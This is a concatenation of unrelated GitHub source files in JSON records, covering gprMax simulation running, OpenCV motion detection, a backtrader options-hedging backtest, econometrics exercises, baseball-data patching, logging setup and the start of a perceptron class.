datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\r\ngprmax_logger = setup_logger(\"gprMax_scenario_runner\", global_timestamp)\r\ngprmax_logger.info(\"Starting gprMax simulations\")\r\n\r\n# ! 
Modify this if individual simulation files are elsewhere\r\nscenarios_folder = Path.cwd() / 'scenarios_empty'\r\n\r\ngprmax_logger.info(\"Processing %s\", scenarios_folder)\r\n\r\nscenarios_files = list(scenarios_folder.glob(\"*.py\"))\r\n\r\ngprmax_logger.info(\"Found %d files\", len(scenarios_files))\r\n\r\nfor scenario_file in scenarios_files:\r\n try:\r\n gprmax_logger.info(\"Running %s\", scenario_file)\r\n gprMax.gprMax.api(str(scenario_file), write_processed=True)\r\n except GeneralError as e:\r\n gprmax_logger.exception(\"gprMax error during simulation\")\r\n else:\r\n gprmax_logger.info(\"Simulation completed successfully\")\r\n\r\ngprmax_logger.info(\"All files processed\")\r\n\r\nlogging.shutdown()\r\n","repo_name":"pipebots/t6_gprMax_simulations","sub_path":"run_scenarios.py","file_name":"run_scenarios.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45639928524","text":"import cv2\nfrom aug_algorithms import brightness\n\n\ndef get_brightness(image_frame):\n hue_saturation_value = cv2.cvtColor(image_frame, cv2.COLOR_BGR2HSV)\n _, _, value = cv2.split(hue_saturation_value)\n return value\n\n\n# cap = cv2.VideoCapture('input_video.mp4')\ncap = cv2.VideoCapture(0)\nret, frame = cap.read()\nsize = (frame.shape[1], frame.shape[0])\n\naction_video = cv2.VideoWriter(filename='frames_without_actions.mp4', fourcc=cv2.VideoWriter_fourcc(*'MP4V'),\n fps=20, frameSize=size)\ncroses_video = cv2.VideoWriter(filename='input_video_with_red_cross.mp4', fourcc=cv2.VideoWriter_fourcc(*'MP4V'),\n fps=20, frameSize=size)\n\nprevious_frame = frame\naction_video.write(frame)\ncroses_video.write(frame)\nprevious_frame_birghtness = get_brightness(frame)\nflag = 0\nwhile True:\n ret, current_frame = cap.read()\n current_brightness = get_brightness(current_frame)\n delta_brightness = cv2.absdiff(current_brightness, previous_frame_birghtness)\n\n # try to reduce the brightness\n previous_frame_bright = brightness(previous_frame, param=15)\n current_frame_bright = brightness(current_frame, param=15)\n\n # convert to grey scale\n previous_gray = cv2.cvtColor(previous_frame_bright, cv2.COLOR_BGR2GRAY)\n current_gray = cv2.cvtColor(current_frame_bright, cv2.COLOR_BGR2GRAY)\n\n # try blurring the frames\n previous_gray_blur = cv2.GaussianBlur(src=previous_gray, ksize=(21, 21), sigmaX=0)\n current_gray_blur = cv2.GaussianBlur(src=current_gray, ksize=(21, 21), sigmaX=0)\n\n # calculating difference between the 2 frames\n diff = cv2.absdiff(previous_gray_blur, current_gray_blur)\n\n # thresholding\n _, diff_blur_thresh = cv2.threshold(src=diff, thresh=20, maxval=255, type=cv2.THRESH_BINARY)\n diff_blur_thresh = cv2.dilate(src=diff_blur_thresh, kernel=None, iterations=2)\n\n # find contours\n counts, _ = cv2.findContours(image=diff_blur_thresh.copy(), mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # find max area of the contours\n max_area_size = -1\n for c in counts:\n M = cv2.moments(c)\n area = M['m00']\n if area > max_area_size:\n max_area_size = area\n\n display_frame = current_frame.copy()\n # print(max_area_size, len(counts))\n # check if there is movement or not based on the threshold: 10 - 314000\n if max_area_size < 10 or max_area_size > 314000:\n cv2.line(img=display_frame, pt1=(0, 0), pt2=(current_frame.shape[1] - 1, current_frame.shape[0] - 1),\n color=(0, 0, 255), thickness=5, lineType=cv2.LINE_4)\n cv2.line(img=display_frame, pt1=(current_frame.shape[1] - 1, 0), pt2=(0, 
current_frame.shape[0] - 1),\n color=(0, 0, 255), thickness=5, lineType=cv2.LINE_4)\n if flag != 0:\n print(flag)\n flag = 0\n else:\n action_video.write(current_frame)\n flag += 1\n\n cv2.imshow('current_frame', display_frame)\n # quit when the 'q' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n crosses_video.write(display_frame)\n\n previous_frame = current_frame\n previous_frame_brightness = current_brightness\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"dluca14/Master_ML","sub_path":"FCV/Proiect2_FCV/video_script.py","file_name":"video_script.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16563247686","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 13 10:45:56 2019\r\n\r\n@author: DELL\r\n\"\"\"\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\nimport backtrader as bt\r\nimport pyfolio as pf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport optimizer\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n#%matplotlib inline\r\n\r\n\r\n\r\n\r\n#Create a Strategy #\r\nclass TestStrategy(bt.Strategy):\r\n\r\n    params = (('vix_lowBound',30),\\\r\n ('vix_upBound',20),\\\r\n ('vixRatio10_buy',0.2),\\\r\n ('vixRatio10_sell',0.4),\\\r\n ('smaRatio_sell',1.015),\\\r\n ('stop_loss',0.1),\\\r\n ('trail',0.1)\r\n )\r\n\r\n def log(self, txt, dt=None,doprint=False):\r\n ''' Logging function for this strategy'''\r\n if opt2 or doprint:\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.broker.set_coc(True)\r\n\r\n self.dataclose={}\r\n self.dataopen={}\r\n self.datalow={}\r\n self.datahigh={}\r\n self.volume={}\r\n self.order={}\r\n self.trade_sig={}\r\n self.signal1={}\r\n self.signal2={} \r\n self.signal3={} \r\n self.close_sig={}\r\n self.w_portfolio=w_portfolio\r\n self.w_close=[0]*num\r\n self.option_ratio=option_ratio[opt]\r\n self.sma5 = bt.indicators.SMA(self.data, period=5)\r\n self.sma10 = bt.indicators.SMA(self.data, period=10) \r\n self.sma20 = bt.indicators.SMA(self.data, period=20)\r\n self.sma30 = bt.indicators.SMA(self.data, period=30)\r\n self.sma60 = bt.indicators.SMA(self.data, period=60) \r\n vix=Vix()\r\n vixRatio10=VixRatio10() \r\n crossOver=bt.Or(bt.And(self.sma5/self.sma10<1,self.sma20/self.sma60<1,\\\r\n vixRatio10<=vixRatio10_buy[opt]),\\\r\n bt.And(self.sma5/self.sma10<1,self.sma20/self.sma60<1,\\\r\n vix<=self.p.vix_upBound))\r\n \r\n crossDown=bt.Or(vixRatio10>=self.p.vixRatio10_sell,\\\r\n self.sma5/self.sma10>self.p.smaRatio_sell)\r\n\r\n if opt6:\r\n percent=Percentile() \r\n cover_call=percent<=0.2\r\n protect_put=percent>=0.8\r\n collar=bt.And(percent<0.8,percent>0.2)\r\n\r\n # Keep a reference to the \"close\" line in the data dataseries\r\n for i,data in enumerate(self.datas):\r\n self.dataclose[i] = self.datas[i].close\r\n self.dataopen[i]=self.datas[i].open\r\n self.datalow[i]=self.datas[i].low\r\n self.datahigh[i]=self.datas[i].high\r\n self.volume[i]=abs(self.datas[i].volume)\r\n \r\n # To keep track of pending orders and buy price/commission\r\n self.order[i] = None\r\n self.buyprice = None\r\n self.buycomm = None\r\n self.bar_executed=None\r\n self.trade_sig[i]=crossOver \r\n self.close_sig[i]=crossDown\r\n \r\n if opt6:\r\n self.signal1[i]=cover_call\r\n 
self.signal2[i]=protect_put\r\n self.signal3[i]=collar \r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Submitted, order.Accepted]:\r\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\r\n return\r\n\r\n # Check if an order has been completed\r\n # Attention: broker could reject order if not enough cash\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n self.log(\r\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\r\n (order.executed.price,\r\n order.executed.value,\r\n order.executed.comm))\r\n\r\n self.buyprice = order.executed.price\r\n self.buycomm= order.executed.comm\r\n else: # Sell\r\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\r\n (order.executed.price,\r\n order.executed.value,\r\n order.executed.comm))\r\n\r\n self.bar_executed = len(self)\r\n \r\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\r\n self.log('Order Canceled/Margin/Rejected')\r\n\r\n## stop loss for each asset\r\n# if not self.getposition: # we left the market\r\n\r\n# return\r\n \r\n# if not self.p.trail:\r\n\r\n# stop_price = order.executed.price * (1.0 - self.p.stop_loss)\r\n# self.close(exectype=bt.Order.Stop, price=stop_price)\r\n \r\n# else:\r\n# self.close(exectype=bt.Order.StopTrail, trailamount=self.p.trail) \r\n \r\n for i,data in enumerate(self.datas):\r\n self.order[i] = None\r\n\r\n def notify_trade(self, trade):\r\n if not trade.isclosed:\r\n return\r\n\r\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %\r\n (trade.pnl, trade.pnlcomm))\r\n\r\n def next(self):\r\n \r\n # Simply log the closing price of the series from the reference\r\n# self.log('Close, %.2f' % self.dataclose[0])\r\n for i, data in enumerate(self.datas):\r\n data_name = data._name\r\n pos = self.getposition(data).size\r\n self.log('{} Position {}'.format(data_name, pos))\r\n\r\n # Check if an order is pending ... 
if yes, we cannot send a 2nd one\r\n if self.order[i]:\r\n return\r\n \r\n \r\n else:\r\n if rebalance==\"no rebalance\":\r\n if not self.getposition(data):\r\n self.order[i]=self.order_target_percent(data=self.datas[i],\\\r\n target=self.w_portfolio[i]) \r\n \r\n \r\n elif rebalance==\"rebalance\":\r\n \r\n if opt6:\r\n\r\n if not self.getposition(data) and self.trade_sig[i]:\r\n \r\n # buy the underlying assets on the entry signal\r\n if i<num-2:\r\n self.order[i]=self.order_target_percent(data=self.datas[i],\\\r\n target=self.w_portfolio[i])\r\n \r\n # near month end, close any open option positions\r\n if i>=num-2 and self.getposition(self.datas[i]): \r\n \r\n if self.data.datetime.date().weekday() == 2 and \\\r\n str(self.data.datetime.date())[8:]>='25':\r\n \r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=self.w_close[i])\r\n \r\n \r\n if i>=num-2 and not self.getposition(self.datas[num-1]) and\\\r\n not self.getposition(self.datas[num-2]) and self.getposition(self.datas[0]):\r\n \r\n if self.signal1[i]:\r\n \r\n size=[0]*(num-2)+[int(self.volume[num-2]*self.option_ratio),0]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i])\r\n \r\n \r\n elif self.signal2[i]:\r\n \r\n size=[0]*(num-2)+[0,int(self.volume[num-1]*self.option_ratio)]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i]) \r\n \r\n else:\r\n \r\n size=[0]*(num-2)+[int(self.volume[num-2]*self.option_ratio),int(self.volume[num-1]*0.1)]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i])\r\n else:\r\n\r\n if not self.getposition(data) and self.trade_sig[i]:\r\n \r\n self.order[i]=self.order_target_percent(data=self.datas[i],\\\r\n target=self.w_portfolio[i]) \r\n \r\n if self.getposition(data) and self.close_sig[i]:\r\n self.order[i]=self.close(data=self.datas[i])\r\n \r\n\r\n\r\n# last day close position \r\n if len(self.datas[i]) == self.datas[i].buflen()-1:\r\n self.order[i]=self.close(data=self.datas[i])\r\n \r\n \r\n\r\n \r\n def stop(self): \r\n self.log('(vixRatio_sell %.2f) Ending Value %.2f'%\\\r\n (self.params.vixRatio10_sell,\\\r\n self.broker.getvalue()),doprint=True)\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n '''Option setting'''\r\n opt=1# CN=0,US=1\r\n opt2=1# optimization=0,backtest=1\r\n opt3=1# portfolio with index=0,portfolio with stock=1\r\n opt4=1#no rebalance=0,rebalance=1\r\n opt5=0# inverse ETF weight option: 0.1,0.2,0.3,0.4,0.5\r\n opt6=1#no option=0,with option=1\r\n \r\n read_path='data/'\r\n save_path='parameter result'\r\n name=['data_CN','data_US']\r\n name2=['stock_CN','stock_US'] \r\n name8=['data_optCN','data_optUS']\r\n\r\n indexName_CN=['SSE50','SSE50 Short']\r\n stockName_CN=['中国平安','贵州茅台','招商银行','伊利股份',\\\r\n '恒瑞医药','保利地产','中信证券','海螺水泥','三一重工','上汽集团']\r\n indexName_US=['SPY500','SPY500 Short']\r\n stockName_US=['MicroSoft','Apple','Berkshire Hathaway','JP Morgan',\\\r\n 'Johnson','Exxon Mobil','AT&T','Procter & Gamble',\\\r\n 'Disney','Coca Cola']\r\n \r\n optionName_CN=['SSE50 call','SSE50 put']\r\n optionName_US=['S&P500 call','S&P500 put']\r\n \r\n name3=[indexName_CN,indexName_US]\r\n name4=[stockName_CN,stockName_US]\r\n name5=[name3,name4]\r\n name9=[optionName_CN,optionName_US]\r\n\r\n name6=['data_IVIX','data_VIX']\r\n name7=['percentile_CN','percentile_US']\r\n\r\n index=pd.read_excel(read_path+name[opt]+'.xlsx')['close']\r\n vix=pd.read_excel(read_path+name6[opt]+'.xlsx')['close']\r\n percent=pd.read_excel(read_path+name7[opt]+'.xlsx')['percentage']\r\n \r\n startDate=['2015-03-01','2016-05-01']#for CN and US\r\n \r\n result_name=[\"performance_CN.csv\",\"performance_US.csv\"]\r\n \r\n \r\n commission_ratio=0.0003\r\n cash_ratio=0.005## for commission and option payment\r\n 
cash=500000\r\n count=0##stock count\r\n optimize_count=0## optimization count\r\n days=252#trading days in a year\r\n mday=22#trading days in a month\r\n num_list=[4,13]##asset number list\r\n num=num_list[opt3]##asset number: 4 for portfolio with index, 13 for portfolio with stock (each includes the inverse ETF and two option feeds)\r\n risk_averse=2#risk preference\r\n vixRatio10_buy=[-0.2,0.2]\r\n option_ratio=[0.05,0.05]\r\n \r\n\r\n situations=[\"optimization\",\"backtest\"]\r\n rebalance_list=[\"no rebalance\",\"rebalance\"]\r\n situation=situations[opt2]\r\n rebalance=rebalance_list[opt4]\r\n performance=pd.DataFrame(columns=[\"n\",\"Profit\",\"Sharpe Ratio\",\\\r\n \"Max Drawdown\",\"Trade Num\"])\r\n stock=pd.read_excel(read_path+name2[opt]+'.xlsx')\r\n stock=stock.iloc[:,range(3,len(stock.columns),5)]\r\n stock.columns=name4[opt]\r\n histRtn=np.log(stock/stock.shift(1))\r\n histRtn=histRtn.fillna(0)\r\n annRtn=histRtn.mean()*days\r\n cov=histRtn.cov()*days\r\n \r\n optimizer_stock=optimizer.optimizer()\r\n w=optimizer_stock.optimize(annRtn,risk_averse,cov)\r\n w_asset=[0.1,0.2,0.3,0.4,0.5]\r\n w_stock=[w_asset[opt5]*(1-cash_ratio)]+((1-w_asset[opt5])*w*(1-cash_ratio)).tolist()\r\n w_index=[w_asset[opt5]*(1-cash_ratio),(1-w_asset[opt5])*(1-cash_ratio)]\r\n w_list=[w_index,w_stock]\r\n w_portfolio=w_list[opt3]\r\n \r\n \r\n\r\n class Vix(bt.Indicator):\r\n \r\n lines=('vix',)\r\n \r\n def next(self):\r\n self.lines.vix[0]=vix[0]\r\n \r\n def once(self, start, end):\r\n vix_array = self.lines.vix.array\r\n \r\n for i in range(start, end):\r\n vix_array[i] = vix[i]\r\n \r\n class VixRatio10(bt.Indicator):\r\n \r\n lines=('vixRatio10',)\r\n \r\n def next(self):\r\n self.lines.vixRatio10[0]=0\r\n \r\n def once(self, start, end):\r\n vixRatio10_array = self.lines.vixRatio10.array\r\n \r\n for i in range(start, end):\r\n vixRatio10_array[i] = vix[i]/vix[i-10]-1\r\n \r\n\r\n class Percentile(bt.Indicator):\r\n \r\n lines=('percent',)\r\n \r\n def next(self):\r\n self.lines.percent[0]=percent[0]\r\n \r\n def once(self, start, end):\r\n percent_array = self.lines.percent.array\r\n \r\n for i in range(start, end):\r\n percent_array[i] = percent[i]\r\n \r\n \r\n cerebro = bt.Cerebro(stdstats=False)\r\n cerebro.broker.setcash(cash)\r\n # Set the commission - 0.03% ... 
divide by 100 to remove the %\r\n cerebro.broker.setcommission(commission=commission_ratio)\r\n # Add a FixedSize sizer according to the stake\r\n# cerebro.addsizer(bt.sizers.FixedSize, stake=1)\r\n \r\n # Add a strategy\r\n if situation==\"backtest\":\r\n cerebro.addstrategy(TestStrategy) \r\n elif situation==\"optimization\":\r\n cerebro.optstrategy(TestStrategy,vixRatio10_buy=[x/10 for x in range(-5,5,1)])\r\n\r\n \r\n # Add the Data Feed to Cerebro \r\n \r\n rawData=pd.read_excel(read_path+name[opt]+'.xlsx')\r\n rawData=rawData.loc[startDate[opt]:'2019',:]\r\n rawData['open.1']=rawData['close.1']\r\n rawData['high.1']=rawData['close.1']\r\n rawData['low.1']=rawData['close.1']\r\n rawData=rawData.dropna()\r\n benchmark=(rawData['close'].diff()/rawData['close'].shift(1)).fillna(0)\r\n benchmark=benchmark.rename('Benchmark')\r\n benchmark.index=benchmark.index.tz_localize('UTC')\r\n \r\n optData=pd.read_excel(read_path+name8[opt]+'.xlsx')\r\n optData=optData.loc[startDate[opt]:'2019',:]\r\n optData.index=pd.to_datetime(optData.index)\r\n optData=optData.dropna()\r\n \r\n tempData=rawData.iloc[:,5:10]\r\n tempData.columns=['open','high','low','close','volume']\r\n data0=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n cerebro.adddata(data0,name=name3[opt][1])\r\n \r\n data_range=[range(0,5,5),range(10,len(rawData.columns),5)]\r\n #10,len(rawData.columns),5 for stocks; 0,5,5 for index\r\n \r\n for i in data_range[opt3]:\r\n tempData=rawData.iloc[:,i:i+5]\r\n tempData.columns=['open','high','low','close','volume'] \r\n data=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n data.plotinfo.plotmaster=data0\r\n cerebro.adddata(data,name=name5[opt3][opt][count])\r\n count+=1\r\n \r\n count=0\r\n \r\n if opt6:\r\n for i in range(0,len(optData.columns),5):\r\n tempData=np.power(-1,count+1)*optData.iloc[:,i:i+5]\r\n tempData.columns=['open','high','low','close','volume'] \r\n data=bt.feeds.PandasData(dataname=tempData,openinterest=None)\r\n data.plotinfo.plotmaster=data0\r\n cerebro.adddata(data,name=name9[opt][count])\r\n count+=1\r\n \r\n cerebro.addanalyzer(bt.analyzers.PyFolio)\r\n cerebro.addanalyzer(bt.analyzers.SharpeRatio, _name='Sharpe')\r\n cerebro.addanalyzer(bt.analyzers.DrawDown, _name='Drawdown')\r\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name='Trade')\r\n\r\n if situation==\"backtest\":\r\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\r\n\r\n results=cerebro.run(maxcpus=1)\r\n \r\n if situation==\"backtest\": \r\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue()) \r\n \r\n# cerebro.plot(volume=False)\r\n\r\n if situation==\"backtest\":\r\n\r\n\r\n pyfoliozer = results[0].analyzers.getbyname('pyfolio')\r\n portfolio_rets, positions, transactions, gross_lev = pyfoliozer.get_pf_items()\r\n #utc time\r\n portfolio_rets.index = portfolio_rets.index.tz_convert('UTC')\r\n positions.index = positions.index.tz_convert('UTC')\r\n transactions.index = transactions.index.tz_convert('UTC')\r\n \r\n # pyfolio show\r\n \r\n pf.create_full_tear_sheet(\r\n returns=portfolio_rets,\r\n positions=positions,\r\n transactions=transactions,\r\n # gross_lev=gross_lev,\r\n live_start_date=None, # This date is sample specific\r\n cone_std=(1.0, 1.5, 2.0),\r\n benchmark_rets=benchmark,\r\n bootstrap=False,\r\n turnover_denom='AGB',\r\n header_rows=None)\r\n\r\n elif situation==\"optimization\":\r\n\r\n result = [x[0] for x in results]\r\n \r\n for res in result:\r\n performance.loc[optimize_count,\"n\"]=res.params.vix_lowBound\r\n 
performance.loc[optimize_count,\"Profit\"]=round(res.analyzers.Trade.\\\r\n get_analysis()[\"pnl\"][\"gross\"]['total'],2)\r\n performance.loc[optimize_count,\"Sharpe Ratio\"]=round(res.analyzers.\\\r\n Sharpe.get_analysis()['sharperatio'],2)\r\n performance.loc[optimize_count,\"Max Drawdown\"]=round(res.analyzers.Drawdown.\\\r\n get_analysis().max.drawdown,2)\r\n performance.loc[optimize_count,\"Trade Num\"]=round(res.analyzers.Trade.\\\r\n get_analysis()['total']['total'],2) \r\n optimize_count+=1\r\n \r\n performance.to_csv(save_path+result_name[opt])\r\n \r\n","repo_name":"CongCao52/reports","sub_path":"Index Options(ETF) Hedging Strategy/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":19475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72625335412","text":"\"\"\"\nGiven an array of integers, return a new array such that each element at index i of the new array\nis the product of all the numbers in the original array except the one at i.\n\"\"\"\n\n\"\"\"\nMittels Division gelöst.\n\"\"\"\ndef produkt(liste):\n neueListe = list()\n ergebnis = 1\n #alle werte multiplizieren\n for i in range(0, len(liste)):\n ergebnis *= liste[i]\n #durch die jeweilige Stelle teilen um i auszuschließen\n for i in range(0, len(liste)):\n neueListe.append(ergebnis // liste[i])\n\n return neueListe\n\n\"\"\"\nBonus: What if you can't use division?\n\"\"\"\ndef ohneDiv(liste):\n neueListe = list()\n ergebnis = 1\n\n for i in range(0, len(liste)):\n #in der zweiten Schleife die eigentliche Rechnung durchführen\n for j in range(0 , len(liste)):\n #Stelle i darf nicht bei sich selbst multipliziert werden\n if j != i:\n ergebnis *= liste[j]\n else:\n continue\n neueListe.append(ergebnis)\n #ergebnis wieder zurücksetzen damit jede Stelle neu ausgerechnet werden kann\n ergebnis = 1\n\n return neueListe\n\nif __name__ == \"__main__\":\n #beispielarray\n array = [1,2,3,4,5]\n\n print(produkt(array))\n print(ohneDiv(array))","repo_name":"LennartPaciner/python-stuff","sub_path":"Exercises/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71342050293","text":"import wooldridge\nimport statsmodels.api as sm\nimport numpy as np\nimport pandas as pd\n\n# c1\ndf = wooldridge.dataWoo('VOTE1')\n'''y = df['voteA']\nX = pd.DataFrame([np.log(df['expendA']), np.log(df['expendB']), np.log(df['prtystrA'])]).T\nX = sm.add_constant(X)\nmodel = sm.OLS(y, X).fit()'''\nmodel = sm.formula.ols(formula='voteA ~ np.log(expendA) + np.log(expendB) + np.log(prtystrA)', data=df).fit()\nprint(model.summary)\n\n# c6\ndf = wooldridge.dataWoo('WAGE2')\nmodel = sm.formula.ols(formula='np.log(wage) ~ educ + exper +tenure', data=df).fit()\nprint(model.summary)\nf_test = model.f_test('educ=exper')\nprint(f_test)\n\n# c8\ndf = wooldridge.dataWoo('401KSUBS')\ndf = df[df['fsize'] == 1]\nmodel = sm.formula.ols('nettfa ~ inc + age', data=df).fit()\nf_test = model.f_test('age = 1')\n","repo_name":"dy0703/pycharm","sub_path":"Data Analysis/Econometric/Chap_4(Multiple regression analysis Inference.py","file_name":"Chap_4(Multiple regression analysis Inference.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13415794445","text":"from dataclasses import dataclass, field\nfrom datetime import datetime\n\nimport 
vigorish.database as db\nfrom vigorish.enums import DataSet\nfrom vigorish.patch.base import Patch, PatchList\nfrom vigorish.util.dt_format_strings import DATE_ONLY\nfrom vigorish.util.result import Result\n\n\n@dataclass\nclass BrooksGamesForDatePatchList(PatchList):\n @property\n def game_date(self):\n return datetime.strptime(self.url_id, DATE_ONLY) if self.url_id else None\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_list_id = \"__brooks_games_for_date_patch_list__\"\n\n def apply(self, data, db_session):\n for patch in self.patch_list:\n data = patch.apply(data)\n patch.apply_to_database(data, db_session)\n return Result.Ok(data)\n\n\n@dataclass\nclass PatchBrooksGamesForDateBBRefGameID(Patch):\n game_date: str = field(repr=False)\n invalid_bbref_game_id: str\n valid_bbref_game_id: str\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_id = \"__patch_brooks_games_for_date_bbref_game_id__\"\n\n def apply(self, data):\n if self.invalid_bbref_game_id in data.all_bbref_game_ids:\n for game_info in data.games:\n if game_info.bbref_game_id == self.invalid_bbref_game_id:\n game_info.bbref_game_id = self.valid_bbref_game_id\n break\n return data\n\n def apply_to_database(self, data, db_session):\n delete_pitchfx_with_invalid_id(db_session, self.invalid_bbref_game_id)\n delete_pitch_apps_with_invalid_id(db_session, self.invalid_bbref_game_id)\n delete_game_status(db_session, self.invalid_bbref_game_id)\n update_game_status(db_session, data, self.valid_bbref_game_id)\n db_session.commit()\n\n\n@dataclass\nclass PatchBrooksGamesForDateRemoveGame(Patch):\n game_date: str = field(repr=False)\n remove_bbref_game_id: str\n\n def __post_init__(self):\n self.data_set = DataSet.BROOKS_GAMES_FOR_DATE\n self.patch_id = \"__patch_brooks_games_for_date_remove_game__\"\n\n def apply(self, data):\n data.games = list(filter(lambda x: x.bbref_game_id != self.remove_bbref_game_id, data.games))\n data.game_count = len(data.games)\n return data\n\n def apply_to_database(self, data, db_session):\n delete_pitchfx_with_invalid_id(db_session, self.remove_bbref_game_id)\n delete_pitch_apps_with_invalid_id(db_session, self.remove_bbref_game_id)\n delete_game_status(db_session, self.remove_bbref_game_id)\n update_date_status(db_session, data)\n db_session.commit()\n\n\ndef delete_pitchfx_with_invalid_id(db_session, bbref_game_id):\n all_pfx_with_invalid_id = db_session.query(db.PitchFx).filter_by(bbref_game_id=bbref_game_id).all()\n for pfx in all_pfx_with_invalid_id:\n db_session.delete(pfx)\n\n\ndef delete_pitch_apps_with_invalid_id(db_session, bbref_game_id):\n all_pitch_apps_with_invalid_id = (\n db_session.query(db.PitchAppScrapeStatus).filter_by(bbref_game_id=bbref_game_id).all()\n )\n for pitch_app in all_pitch_apps_with_invalid_id:\n db_session.delete(pitch_app)\n\n\ndef delete_game_status(db_session, bbref_game_id):\n game_status = db.GameScrapeStatus.find_by_bbref_game_id(db_session, bbref_game_id)\n if game_status:\n db_session.delete(game_status)\n\n\ndef update_game_status(db_session, data, bbref_game_id):\n game_status = db.GameScrapeStatus.find_by_bbref_game_id(db_session, bbref_game_id)\n if game_status:\n for game_info in data.games:\n if game_info.bbref_game_id == bbref_game_id:\n game_status.bb_game_id = game_info.bb_game_id\n game_status.game_time_hour = game_info.game_time_hour\n game_status.game_time_minute = game_info.game_time_minute\n game_status.game_time_zone = game_info.time_zone_name\n 
game_status.pitch_app_count_brooks = game_info.pitcher_appearance_count\n break\n\n\ndef update_date_status(db_session, data):\n date_status = db.DateScrapeStatus.find_by_date(db_session, data.game_date)\n date_status.game_count_brooks = data.game_count\n","repo_name":"a-luna/vigorish","sub_path":"src/vigorish/patch/brooks_games_for_date.py","file_name":"brooks_games_for_date.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39353223499","text":"import os\nimport sys\nimport logging\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s: %(message)s]\"\nlog_dir = \"logs\"\nlog_filepath = os.path.join(log_dir, \"running_logs.log\")\nos.makedirs(log_dir, exist_ok=True)\n\n# configure logging.basicConfig with our custom logging configuration\nlogging.basicConfig(\n level=logging.INFO,\n format=logging_str,\n \n handlers=[\n logging.FileHandler(log_filepath), # store logs in logging files\n logging.StreamHandler(sys.stdout), # show logs in terminal\n ]\n)\n\nlogger = logging.getLogger(\"textSummarizerLogger\")","repo_name":"phiisonfire/text-summarizer","sub_path":"src/textSummarizer/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18778642826","text":"import matplotlib.pyplot as plt\nfrom itertools import product as cartesian_product\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport sympy as sm\nimport numpy as np\nimport os\n\nclass Perceptron:\n \"\"\"\n Class that represents a multi layer perceptron\n ...\n\n Attributes\n ----------\n X_train : np.array\n Numpy matrix (N x K) of the training data, N is the number of datapoints and K is the number of features\n Y_train : np.array\n Numpy matrix (N x M) of the outputs of the training data, N is the number of datapoints and M is the number of outputs\n X_validation : np.array\n Numpy matrix (Nv x K) of the validation data, Nv is the number of datapoints and K is the number of features\n Y_validation : np.array\n Numpy matrix (Nv x M) of the outputs of the validation data, Nv is the number of datapoints and M is the number of outputs\n X_test : np.array\n Numpy matrix (Nt x K) of the test data, Nt is the number of datapoints and K is the number of features\n hl : int\n Number of hidden layers\n hn : int\n Number of neurons per hidden layer\n \"\"\"\n \n def __init__(self, X_train, Y_train, X_validation, Y_validation, X_test, hl, hn):\n\n # initialize parameters received\n\n self.hl = hl\n self.hn = hn\n\n self.X_validation = X_validation\n self.Y_validation = Y_validation\n self.X_test = X_test\n\n self.X_train = X_train\n self.Y_train = Y_train\n self.Y_dtrain = sm.Matrix(Y_train).T\n \n self.n_dim = X_train.shape[1]\n self.N = X_train.shape[0]\n self.inputs = self.n_dim\n self.M = self.Y_dtrain.shape[0]\n self.Yd_train = np.reshape(Y_train,(self.N,self.M))\n self.model_name = f\"MLP hl = {hl} hn= {hn}\"\n\n # Initialize neuron and layer numbers\n self.neurons_input = self.inputs\n self.layers_hidden = hl\n self.neurons_hidden = [hn] * hl\n self.outputs = self.M\n self.weights_dimensions = [self.inputs ,self.neurons_input] + self.neurons_hidden + [self.outputs]\n self.neurons_numbers = 